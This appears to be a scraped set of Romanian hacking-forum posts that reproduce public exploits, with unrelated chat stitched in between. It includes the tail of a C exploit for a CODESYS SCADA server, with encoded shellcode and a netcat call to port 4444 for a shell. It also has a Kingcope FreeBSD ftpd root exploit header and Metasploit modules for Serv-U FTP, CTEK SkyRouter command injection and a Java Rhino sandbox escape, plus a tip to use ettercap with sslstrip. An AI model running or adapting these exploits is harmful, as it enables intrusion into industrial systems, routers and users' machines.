"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58" "\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34" "\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38" "\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d" "\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48" "\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56" "\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46" "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57" "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e" "\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50" "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34" "\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31" "\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a" "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" "\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52" "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d" "\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46" "\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55" "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36" "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c" "\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52" "\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" "\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f" "\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56" "\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56" "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f" "\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a"; printf ("\n%s\n by SignalSEC Labs - www.signalsec.com\n", name); if (argc < 2) { printf ("\nUsage: codesys [IP]\n"); exit (-1); } setenv (target, argv[1], 1); memset (request, '\0', sizeof (request)); ptr = request; strcat (request, "GET /"); for(i = 1; i < 776; i++){ strcat (request, JUNK); } strcat (request, ret); strcat (request, hellcode); strcat (request, " HTTP/1.1"); strcat (request, "\r\n"); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("\nsocket error\n"); exit (1); } dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(PORT); if (! inet_aton(argv[1], &(dest_addr.sin_addr))) { perror("inet_aton problems"); exit (2); } memset( &(dest_addr.sin_zero), '\0', 8); if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){ perror("\nCouldnt connect to target!\n"); close (sock); exit (3); } payload = (send (sock, ptr, strlen(request), 0)); if (payload == -1) { perror("\nCan not send the payload\n"); close (sock); exit(4); } close (sock); printf ("\n[+]Sending payload to SCADA system!\n"); sleep (1); printf ("\n[+]Connecting to port 4444 to get shell!\n"); sleep (2); system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'"); exit (0); } Sursa

Author: Kingcope Published: 2011-12-01 Status: NOT VERIFIED /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit * * KINGCOPE CONFIDENTIAL - SOURCE MATERIALS * * This is unpublished proprietary source code of KINGCOPE Security. * * (C) COPYRIGHT KINGCOPE Security, 2011 * All Rights Reserved * ***************************************************************************** * bug found by Kingcope * thanks to noone except alex whose damn down * * tested against: FreeBSD-8.2,8.1,7.2,7.1 i386; * FreeBSD-6.3 i386 * FreeBSD-5.5,5.2 i386 * FreeBSD-8.2 amd64 * FreeBSD-7.3, 7.0 amd64 * FreeBSD-6.4, 6.2 amd64 * */ Download Sursa

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Serv-U FTP Server <4.2 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the site chmod command in versions of Serv-U FTP Server prior to 4.2. You must have valid credentials to trigger this vulnerability. Exploitation also leaves the service in a non-functional state. }, 'Author' => 'thelightcosine <thelightcosine[at]metasploit.com>', 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2111'], [ 'BID', '9483'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'DisableNops' => true, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP0-4 EN', { 'Ret' => 0x750212bc, #WS2HELP.DLL 'Offset' => 396 } ], [ 'Windows XP SP0-1 EN', { 'Ret' => 0x71aa388f, #WS2HELP.DLL 'Offset' => 394 } ] ], 'DisclosureDate' => 'Dec 31 2004', 'DefaultTarget' => 0)) end def check connect disconnect if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit connect_login eggoptions = { :checksum => true, :eggtag => "W00T" } hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions) buffer = "chmod 777 " buffer << make_nops(target['Offset'] - egg.length - hunter.length) buffer << egg buffer << hunter buffer << "\xeb\xc9\x41\x41" #nseh, jump back to egghunter buffer << [target.ret].pack('V') #seh buffer << rand_text(5000) print_status("Trying target #{target.name}...") send_cmd( ['SITE', buffer] , false) handler disconnect end end Sursa

Love, Love, Love ... WTF? Daca tot e ... sa fie rosie macar nu de alta dar o sa inducem copii in eroare .. ei stiu ca inimioarele sunt rosii

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CTEK SkyRouter 4200 and 4300 Command Execution', 'Description' => %q{ This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300. }, 'Author' => [ 'savant42' ], #with module help from kos 'License' => MSF_LICENSE, 'References' => [ 'URL', 'http://dev.metasploit.com/redmine/issues/5610'], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet netcat-e bash', } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Sep 8 2011', # CGI historical date 'DefaultTarget' => 0)) end def exploit post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26" uri = '/apps/a3/cfg_ethping.cgi' print_status("Sending HTTP request for #{uri}") res = send_request_cgi( { 'global' => true, 'uri' => uri, 'method' => "POST", 'data' => post_data }, 30) if res print_status("The server responded with HTTP CODE #{res.code}") else print_status("The server did not respond to our request") end handler end end Sursa

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet Rhino Script Engine Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc) }, 'License' => MSF_LICENSE, 'Author' => [ 'Michael Schierl', # Discovery 'juan vazquez', # metasploit module 'Edward D. Teach <teach@consortium-of-pwners.net>', 'sinn3r' ], 'References' => [ [ 'CVE', '2011-3544' ], [ 'OSVDB', '76500' ], # 76500 and 76499 have contents mixed [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-305/' ], [ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ], ], 'Platform' => [ 'java', 'win', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Arch' => ARCH_JAVA, } ], [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'Apple OSX', { 'ARCH' => ARCH_X86, 'Platform' => 'osx' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 18 2011' )) end def on_request_uri( cli, request ) if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_redirect(cli, get_resource() + '/', '') return end print_status("#{self.name} handling request from #{cli.peerhost}:#{cli.peerport}...") send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end paths = [ [ "Exploit.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2011-3544", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end print_status( "Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}..." ) send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = "<html><head><title>Loading, Please Wait...</title></head>" html += "<body><center><p>Loading, Please Wait...</p></center>" html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" html += "</applet></body></html>" return html end end Sursa

Bravo ... Ai mai putea adauga si o lista cu plugin-urile vulnerabile la sqli , xss, etc. si in functie de plugin-urile detectate sa le arate pe cele vulnerabile, cum are si wpscan!!

Read the hole story HERE !!! Era prea mare sa pun tot articolul

Nine - Hip Hop Nine - Bionic Nine - Rich Man, Poor Man

WTF?? In ideea ca o sa fac challege-ul mai tarziu am downloadat pe telefon..i. si:

Party Time!!I'm On My Way !!

poti folosi si ettercap + sslstrip sau squid + sslstrip ... cu wireshark poti doar vedea traficul generat pe retea dar cu ettercap te si poti juca cu el and it`s fucking funny !!! De EXEMPLU ... be inventive:D

Nu .. dar am sunat la ei si au zis ca o sa ma sune saptamana asta!!acum depinde totul de ceea ce o sa zica ei cand ma suna!De livrat de buna voie nu cred fa o sa o faca!! adin fericire exista legi care acopera acest gen de abuz din partea operatorilor comerciali!!

Ok ... In cazul asta it`s a date Paaaarrrrtttttyyyy !!

Man ... Si cu asta cum ramane???